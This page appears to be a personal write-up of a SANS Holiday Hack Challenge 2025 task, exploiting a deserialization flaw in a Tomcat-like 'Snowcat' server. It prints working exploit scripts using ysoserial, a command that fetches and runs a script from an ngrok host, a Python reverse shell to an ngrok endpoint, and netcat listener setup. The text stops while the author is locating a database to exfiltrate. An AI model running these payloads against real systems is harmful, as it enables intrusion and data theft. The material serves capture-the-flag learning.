<!DOCTYPE html>
<html lang="en-us" dir="ltr" itemscope itemtype="http://schema.org/Article" data-r-output-format="html">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <meta charset="utf-8">
    <meta name="viewport" content="height=device-height, width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="generator" content="Hugo 0.152.2">
    <meta name="generator" content="Relearn 8.2.0+926ba4d1230e27319cf62da0633eb3420e6af1bf">
    <meta name="description" content="Objective Difficulty: 3/5
Tom, in the hotel, found a wild Snowcat bug. Help him chase down the RCE! Recover and submit the API key not being used by snowcat.
Tom Hessman mission statement Hi, I’m Tom! I’ve worked for Counter Hack since its founding in 2010.
I love all things testing and QA, maintaining systems, logistics, and helping our customers have the best possible experience.">
    <meta name="author" content="">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Snowcat RCE & Priv Esc :: SANS Holiday Hack Challenge 2025">
    <meta name="twitter:description" content="Objective Difficulty: 3/5
Tom, in the hotel, found a wild Snowcat bug. Help him chase down the RCE! Recover and submit the API key not being used by snowcat.
Tom Hessman mission statement Hi, I’m Tom! I’ve worked for Counter Hack since its founding in 2010.
I love all things testing and QA, maintaining systems, logistics, and helping our customers have the best possible experience.">
    <meta property="og:url" content="http://localhost:1313/act3/snowcat-rce-and-priv-esc/index.html">
    <meta property="og:site_name" content="SANS Holiday Hack Challenge 2025">
    <meta property="og:title" content="Snowcat RCE & Priv Esc :: SANS Holiday Hack Challenge 2025">
    <meta property="og:description" content="Objective Difficulty: 3/5
Tom, in the hotel, found a wild Snowcat bug. Help him chase down the RCE! Recover and submit the API key not being used by snowcat.
Tom Hessman mission statement Hi, I’m Tom! I’ve worked for Counter Hack since its founding in 2010.
I love all things testing and QA, maintaining systems, logistics, and helping our customers have the best possible experience.">
    <meta property="og:locale" content="en_us">
    <meta property="og:type" content="website">
    <meta itemprop="name" content="Snowcat RCE & Priv Esc :: SANS Holiday Hack Challenge 2025">
    <meta itemprop="description" content="Objective Difficulty: 3/5
Tom, in the hotel, found a wild Snowcat bug. Help him chase down the RCE! Recover and submit the API key not being used by snowcat.
Tom Hessman mission statement Hi, I’m Tom! I’ve worked for Counter Hack since its founding in 2010.
I love all things testing and QA, maintaining systems, logistics, and helping our customers have the best possible experience.">
    <meta itemprop="datePublished" content="2025-12-12T11:48:06+01:00">
    <meta itemprop="dateModified" content="2025-12-12T11:48:06+01:00">
    <meta itemprop="wordCount" content="1549">
    <title>Snowcat RCE &amp; Priv Esc :: SANS Holiday Hack Challenge 2025</title>
    <link href="/act3/snowcat-rce-and-priv-esc/index.xml" rel="alternate" type="application/rss+xml" title="Snowcat RCE &amp; Priv Esc :: SANS Holiday Hack Challenge 2025">
    <link href="/css/auto-complete/auto-complete.min.css?1766479342" rel="stylesheet">
    <script src="/js/auto-complete/auto-complete.min.js?1766479342" defer></script>
    <script src="/js/search-lunr.js?1766479342" defer></script>
    <script src="/js/search.js?1766479342" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.index_js_url="/searchindex.en.js?1766479342";
    </script>
    <script src="/js/lunr/lunr.min.js?1766479342" defer></script>
    <script src="/js/lunr/lunr.stemmer.support.min.js?1766479342" defer></script>
    <script src="/js/lunr/lunr.multi.min.js?1766479342" defer></script>
    <script src="/js/lunr/lunr.en.min.js?1766479342" defer></script>
    <script>
      window.relearn = window.relearn || {};
      window.relearn.contentLangs=['en'];
    </script>
    <link href="/fonts/fontawesome/css/fontawesome-all.min.css?1766479342" rel="stylesheet" media="print" onload="this.media='all';this.onload=null;"><noscript><link href="/fonts/fontawesome/css/fontawesome-all.min.css?1766479342" rel="stylesheet"></noscript>
    <link href="/css/perfect-scrollbar/perfect-scrollbar.min.css?1766479342" rel="stylesheet">
    <link href="/css/theme.css?1766479342" rel="stylesheet">
    <link href="/css/format-html.css?1766479342" rel="stylesheet" id="R-format-style">
    <script>
      window.relearn = window.relearn || {};
      // configuration
      window.relearn.min = ``;
      window.relearn.path='\/act3\/snowcat-rce-and-priv-esc\/index.html';
      window.relearn.relBasePath='..\/..';
      window.relearn.relBaseUri='..\/..';
      window.relearn.absBaseUri='http:\/\/localhost:1313';
      window.relearn.disableAnchorCopy=false;
      window.relearn.disableAnchorScrolling=false;
      window.relearn.disableInlineCopyToClipboard=false;
      window.relearn.enableBlockCodeWrap=true;
      // legal
      window.relearn.getItem = (s,n) => {return s.getItem(n)};
      window.relearn.setItem = (s,n,v) => {return s.setItem(n,v)};
      window.relearn.removeItem = (s,n) => {return s.removeItem(n)};
      // translations
      window.T_Copy_to_clipboard = `Copy to clipboard`;
      window.T_Copied_to_clipboard = `Copied to clipboard!`;
      window.T_Copy_link_to_clipboard = `Copy link to clipboard`;
      window.T_Link_copied_to_clipboard = `Copied link to clipboard!`;
      window.T_Reset_view = `Reset view`;
      window.T_View_reset = `View reset!`;
      window.T_No_results_found = `No results found for "{0}"`;
      window.T_N_results_found = `{1} results found for "{0}"`;
      // variant stuff
      window.relearn.themevariants = [ 'hhc-2025' ];
      window.relearn.customvariantname = "my-custom-variant";
      window.relearn.changeVariant = function(variant) {
        var oldVariant = document.documentElement.dataset.rThemeVariant;
        window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        document.documentElement.dataset.rThemeVariant = variant;
        if (oldVariant != variant) {
          document.dispatchEvent( new CustomEvent('themeVariantLoaded', { detail: { variant, oldVariant } }) );
          window.relearn.markVariant();
        }
      }
      window.relearn.markVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant");
        document.querySelectorAll(".R-variantswitcher select").forEach((select) => {select.value = variant;});
      }
      window.relearn.initVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant") ?? "";
        if( variant == window.relearn.customvariantname ){
        }else if( !variant || !window.relearn.themevariants.includes(variant) ){
          variant = window.relearn.themevariants[0];
          window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        }
        document.documentElement.dataset.rThemeVariant = variant;
      }
      window.relearn.initVariant();
      window.relearn.markVariant();
    </script>
  </head>
  <body class="mobile-support html" data-url="/act3/snowcat-rce-and-priv-esc/index.html">
    <div id="R-body" class="default-animation">
      <div id="R-body-overlay"></div>
      <nav id="R-topbar">
        <div class="topbar-wrapper">
          <div class="topbar-sidebar-divider"></div>
          <div class="topbar-area topbar-area-start" data-area="start">
            <div class="topbar-button topbar-button-sidebar" data-content-empty="disable" data-width-s="show" data-width-m="hide" data-width-l="hide">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleNav()" type="button" title="Menu (CTRL&#43;ALT&#43;n)"><i class="fa-fw fas fa-bars"></i></button></span>
            </div>
            <div class="topbar-button topbar-button-toc" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="Table of Contents (CTRL&#43;ALT&#43;t)"><i class="fa-fw fas fa-list-alt"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
<nav class="TableOfContents">
  <ul>
    <li><a href="#objective">Objective</a></li>
    <li><a href="#tom-hessman-mission-statement">Tom Hessman mission statement</a></li>
    <li><a href="#solution">Solution</a>
      <ul>
        <li><a href="#setup-attack-infrastructure">Setup attack infrastructure</a></li>
        <li><a href="#reverse-shell">Reverse shell</a></li>
        <li><a href="#getting-root">Getting ROOT</a></li>
      </ul>
    </li>
    <li><a href="#tom-hessman-mission-debrief">Tom Hessman mission debrief</a></li>
  </ul>
</nav>
                </div>
              </div>
            </div>
          </div>
          <ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype="http://schema.org/BreadcrumbList"><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/index.html"><span itemprop="name">Intro</span></a><meta itemprop="position" content="1">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/act3/index.html"><span itemprop="name">Act 3</span></a><meta itemprop="position" content="2">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><span itemprop="name">Snowcat RCE &amp; Priv Esc</span><meta itemprop="position" content="3"></li>
          </ol>
          <div class="topbar-area topbar-area-end" data-area="end">
            <div class="topbar-button topbar-button-prev" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act3/hack-a-gnome/index.html" title="Hack-a-Gnome (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-next" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act3/schrodingers-scope/index.html" title="Schrödingers Scope (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-more" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="More"><i class="fa-fw fas fa-ellipsis-v"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
                  <div class="topbar-area topbar-area-more" data-area="more">
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </nav>
      <div id="R-main-overlay"></div>
      <main id="R-body-inner" class="highlightable act3" tabindex="-1">
        <div class="flex-block-wrapper">
<article class="default">
  <header class="headline">
  </header>

<h1 id="snowcat-rce--priv-esc">Snowcat RCE &amp; Priv Esc</h1>

<p><a href="#R-image-cab2b66381d3f07264d9ba264bdda58a" class="lightbox-link"><img alt="Tom Hessman" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/tomhessman-avatar.gif" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-cab2b66381d3f07264d9ba264bdda58a"><img alt="Tom Hessman" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/tomhessman-avatar.gif"></a></p>
<h2 id="objective">Objective</h2>
<p>Difficulty: 3/5</p>
<p>Tom, in the hotel, found a wild Snowcat bug. Help him chase down the RCE! Recover and submit the API key not being used by snowcat.</p>
<h2 id="tom-hessman-mission-statement">Tom Hessman mission statement</h2>
<blockquote>
<p>Hi, I&rsquo;m Tom! I&rsquo;ve worked for Counter Hack since its founding in 2010.</p>
<p>I love all things testing and QA, maintaining systems, logistics, and helping our customers have the best possible experience.</p>
<p>Outside of work, you&rsquo;ll find me at my local community theater producing shows, helping with sound or video, or just hanging around.</p>
<p>Learn more about my background at TomHessman.com!</p>
<hr>
<p>Well, I might have something developing. Come see me again soon, we&rsquo;ll see.</p>
<hr>
<p>We&rsquo;ve lost access to the neighborhood weather monitoring station.</p>
<p>There are a couple of vulnerabilities in the snowcat and weather monitoring services that we haven&rsquo;t gotten around to fixing.</p>
<p>Can you help me exploit the vulnerabilities and retrieve the other application&rsquo;s authorization key?</p>
<p>Enter the other application&rsquo;s authorization key into the badge.</p>
<p>If Frosty&rsquo;s plan works and everything freezes over, our customers won&rsquo;t be having the best possible experience—they&rsquo;ll be having the coldest possible experience! We need to stop this before the whole neighborhood becomes one giant freezer.</p>
</blockquote>
<h2 id="solution">Solution</h2>
<p>Starting out I were left with a message at the terminal:</p>
<p><a href="#R-image-679bfe0c29447dc16c42de4586823158" class="lightbox-link"><img alt="Introduction terminal" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-1.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-679bfe0c29447dc16c42de4586823158"><img alt="Introduction terminal" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-1.png"></a></p>
<p>Listing what I got nearby I saw there was a <em>notes.md</em> file. Outputting it to screen gave some hints:</p>
<p><a href="#R-image-014067a6f615ab544e7c791eb12b524e" class="lightbox-link"><img alt="Listing folder and reading notes.md" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-2.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-014067a6f615ab544e7c791eb12b524e"><img alt="Listing folder and reading notes.md" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-2.png"></a></p>
<p>The objective is pretty well laid out, like a step by step instruction. There&rsquo;s also a Python file nearby:</p>
<p><a href="#R-image-b274bcac4d6396190140b413d942c014" class="lightbox-link"><img alt="Looking at Python script" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-3.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-b274bcac4d6396190140b413d942c014"><img alt="Looking at Python script" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-3.png"></a></p>
<p>And also a folder with JSP pages:</p>
<p><a href="#R-image-620b2e97f3e3da24d0db16274b49ebca" class="lightbox-link"><img alt="Looking at JSP files" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-4.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-620b2e97f3e3da24d0db16274b49ebca"><img alt="Looking at JSP files" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-4.png"></a></p>
<p>I took all of these JSP pages and uploaded them to ChatGPT asking it for which libraries where in use and if there were any interesting artefacts in them, and I got this table:</p>
<table>
  <thead>
      <tr>
          <th>Library / Component</th>
          <th>Type</th>
          <th>What it does</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Java Standard Library (JDK)</td>
          <td>Core runtime</td>
          <td>Provides I/O (<code>java.io</code>), process execution (<code>Runtime.exec</code>), primitive parsing, and general language features used throughout the JSP scriptlets.</td>
      </tr>
      <tr>
          <td>JSP / Servlet API</td>
          <td>Web framework</td>
          <td>Enables server-side rendering, request/response handling, session management, redirects, and access to implicit objects (<code>request</code>, <code>response</code>, <code>session</code>, <code>out</code>).</td>
      </tr>
      <tr>
          <td>Apache Commons Collections (3.x)</td>
          <td>Utility library</td>
          <td>Supplies <code>MultiValueMap</code>, used to store multiple values per key (here: min/max ranges for weather normalization).</td>
      </tr>
      <tr>
          <td>SQLite JDBC (Xerial)</td>
          <td>Database driver</td>
          <td>Implements the JDBC driver (<code>org.sqlite.JDBC</code>) allowing Java/JSP code to connect to a local SQLite database file for authentication.</td>
      </tr>
      <tr>
          <td>SQLite Database Engine</td>
          <td>Embedded database</td>
          <td>Stores user records (<code>users</code> table) used during login authentication.</td>
      </tr>
      <tr>
          <td>External native binaries (<code>/usr/local/weather/*</code>)</td>
          <td>OS-level dependencies</td>
          <td>Executable programs invoked from Java to retrieve temperature, humidity, and pressure values via stdout.</td>
      </tr>
      <tr>
          <td>CSS (<code>styles.css</code>)</td>
          <td>Frontend styling</td>
          <td>Provides layout and visual styling for login and dashboard pages.</td>
      </tr>
      <tr>
          <td>JavaScript (<code>snowflakes.js</code>)</td>
          <td>Frontend scripting</td>
          <td>Adds client-side visual behavior (snowflake animation effect).</td>
      </tr>
      <tr>
          <td>Servlet Container (e.g., Apache Tomcat)</td>
          <td>Application server</td>
          <td>Hosts the JSPs, provides the Servlet/JSP runtime, session handling, and integrates JDBC drivers and libraries on the classpath.</td>
      </tr>
  </tbody>
</table>
<p>Interesting - I felt had a relatively good understading of the site. However, by reading the <em>notes.md</em> I needed to figure out where this server running. I just took a wild guess since the server IP is never mentioned:</p>
<p><a href="#R-image-07c15acfc958951623941f0272defec4" class="lightbox-link"><img alt="Identifying Snowcat version" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-10.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-07c15acfc958951623941f0272defec4"><img alt="Identifying Snowcat version" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-10.png"></a></p>
<p>And I am in the server already! Thus turning my attention to take the Snowcat exploit in consideration. I followed the instructions in <em>notes.md</em> and crafted this script:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>HOST<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;localhost&#34;</span>
</span></span><span style="display:flex;"><span>PORT<span style="color:#f92672">=</span><span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>SESSION_ID<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -sS --head http://<span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span> | awk -F<span style="color:#e6db74">&#39;[=;]&#39;</span> <span style="color:#e6db74">&#39;/JSESSIONID/ {print $2}&#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>COMMAND<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;curl https://webhook.site/cabdef54-8500-47d7-9906-0513f3c4587b&#34;</span>
</span></span><span style="display:flex;"><span>java -jar ysoserial.jar CommonsCollections7 <span style="color:#e6db74">&#34;</span>$COMMAND<span style="color:#e6db74">&#34;</span> &gt; payload.bin
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>curl -X PUT <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -H <span style="color:#e6db74">&#34;Host: </span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -H <span style="color:#e6db74">&#34;Content-Length: </span><span style="color:#66d9ef">$(</span>wc -c &lt; payload.bin<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -H <span style="color:#e6db74">&#34;Content-Range: bytes 0-</span><span style="color:#66d9ef">$(($(</span>wc -c &lt; payload.bin<span style="color:#66d9ef">)</span><span style="color:#f92672">-</span><span style="color:#ae81ff">1</span><span style="color:#66d9ef">))</span><span style="color:#e6db74">/</span><span style="color:#66d9ef">$(</span>wc -c &lt; payload.bin<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  --data-binary @payload.bin <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#e6db74">&#34;http://</span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">${</span>SESSION_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">/session&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>curl -X GET <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -H <span style="color:#e6db74">&#34;Host: </span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -H <span style="color:#e6db74">&#34;Cookie: JSESSIONID=.</span><span style="color:#e6db74">${</span>SESSION_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#e6db74">&#34;http://</span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">/&#34;</span></span></span></code></pre></div>
<p>As a proof of concept I was able to reach out to my <em>webhook.site</em>. After some tries and pondering, I finally found out how to create a reverse shell. It turns out there has to be some filtering going on or other interference. The usual Linux options to run code sequentially, <code>&amp;&amp;</code> and <code>;</code>, did not work. The solution I cooked up was to split all operations into separate stesp and run them. The easiest way was to implent a function like so:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>HOST<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;localhost&#34;</span>
</span></span><span style="display:flex;"><span>PORT<span style="color:#f92672">=</span><span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>SESSION_ID<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>curl -sS --head http://<span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span> | awk -F<span style="color:#e6db74">&#39;[=;]&#39;</span> <span style="color:#e6db74">&#39;/JSESSIONID/ {print $2}&#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>run_attack<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>        local COMMAND<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$1<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>        java -jar ysoserial.jar CommonsCollections7 <span style="color:#e6db74">&#34;</span>$COMMAND<span style="color:#e6db74">&#34;</span> &gt; payload.bin
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        curl -X PUT <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          -H <span style="color:#e6db74">&#34;Host: </span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          -H <span style="color:#e6db74">&#34;Content-Length: </span><span style="color:#66d9ef">$(</span>wc -c &lt; payload.bin<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          -H <span style="color:#e6db74">&#34;Content-Range: bytes 0-</span><span style="color:#66d9ef">$(($(</span>wc -c &lt; payload.bin<span style="color:#66d9ef">)</span><span style="color:#f92672">-</span><span style="color:#ae81ff">1</span><span style="color:#66d9ef">))</span><span style="color:#e6db74">/</span><span style="color:#66d9ef">$(</span>wc -c &lt; payload.bin<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          --data-binary @payload.bin <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          <span style="color:#e6db74">&#34;http://</span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">${</span>SESSION_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">/session&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        curl -X GET <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          -H <span style="color:#e6db74">&#34;Host: </span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          -H <span style="color:#e6db74">&#34;Cookie: JSESSIONID=.</span><span style="color:#e6db74">${</span>SESSION_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>          <span style="color:#e6db74">&#34;http://</span><span style="color:#e6db74">${</span>HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">:</span><span style="color:#e6db74">${</span>PORT<span style="color:#e6db74">}</span><span style="color:#e6db74">/&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>run_attack <span style="color:#e6db74">&#34;curl -s https://scarabaeiform-prolixly-odin.ngrok-free.dev/shell.sh -o /tmp/shell.sh&#34;</span>
</span></span><span style="display:flex;"><span>run_attack <span style="color:#e6db74">&#34;sh /tmp/shell.sh&#34;</span></span></span></code></pre></div>
<h3 id="setup-attack-infrastructure">Setup attack infrastructure</h3>
<p>Before running the payload creating the reverse shell, I had to set up my infrastructure. This is the same infrastructure I used on <em>&ldquo;Hack a Gnome&rdquo;</em>. The infrastructure is based on <a href="https://ngrok.com/" rel="external">Ngrok</a> and Kali in WSL (in total four instances):</p>
<table>
  <thead>
      <tr>
          <th>Command</th>
          <th>Public</th>
          <th>Description</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>ngrok tcp 8501</td>
          <td>Yes</td>
          <td>Public exposed reverse shell port through Ngrok</td>
      </tr>
      <tr>
          <td>nc -lnvp 8501</td>
          <td>No</td>
          <td>Local (attacking machine) listening port using Netcat mapped to public Ngrok bridge</td>
      </tr>
      <tr>
          <td>ngrok http 8001</td>
          <td>Yes</td>
          <td>Public exposed web server for serving scripts</td>
      </tr>
      <tr>
          <td>python3 -m http.server 8001</td>
          <td>No</td>
          <td>Local (attacking machine) web server mapped to public Ngrok bridge</td>
      </tr>
  </tbody>
</table>
<p>The architecture looks like this:</p>
<pre class="mermaid align-center ">---
config:
      theme: redux
---
flowchart LR
    subgraph Attacker[&#34;Attacking machine&#34;]
        webserver
        netcat
    end

    subgraph NGROK[&#34;NGROK&#34;]
        HTTP
        TCP
    end

    SGCC[&#34;Smart Gnome Control Center&#34;] &lt;--TCP/443--&gt; HTTP
    SGCC[&#34;Smart Gnome Control Center&#34;] &lt;--TCP/19342--&gt; TCP
    HTTP &lt;--TCP/8001--&gt; webserver[&#34;Python webserver&#34;]
    TCP &lt;--TCP/8501--&gt; netcat[&#34;Netcat listener&#34;]</pre>
<h3 id="reverse-shell">Reverse shell</h3>
<p>Launching my payload resulted in a reverse shell:</p>
<p><a href="#R-image-c3336ad2cc584ce5259508cf22b51ff8" class="lightbox-link"><img alt="Got reverse shell" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-5.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-c3336ad2cc584ce5259508cf22b51ff8"><img alt="Got reverse shell" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-5.png"></a></p>
<p>The magic behind it is this Python piece:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#34;5.tcp.eu.ngrok.io&#34;,18288));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&#34;/bin/sh&#34;,&#34;-i&#34;]);&#39;</span></span></span></code></pre></div>
<p>I host this on my webserver. I have instructed my payload to reach out to my webserver, download the script and execute it. When I got shell, I had to upgrade it by issuing:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#39;import pty; pty.spawn(&#34;/bin/bash&#34;)&#39;</span></span></span></code></pre></div>
<p>This is classical CTF. At this point I wondered if I could find the SQLite database ChatGPT told me about. Finding out where Snowcat lives:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>find / -type f -name snowcat</span></span></code></pre></div>
<p>I found directory <em>/usr/local/snowcat/</em>. Entering the folder and finding the database, smuggle it out as Base64 string:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cd /usr/local/snowcat/
</span></span><span style="display:flex;"><span>find . -name <span style="color:#e6db74">&#34;weather.db&#34;</span>
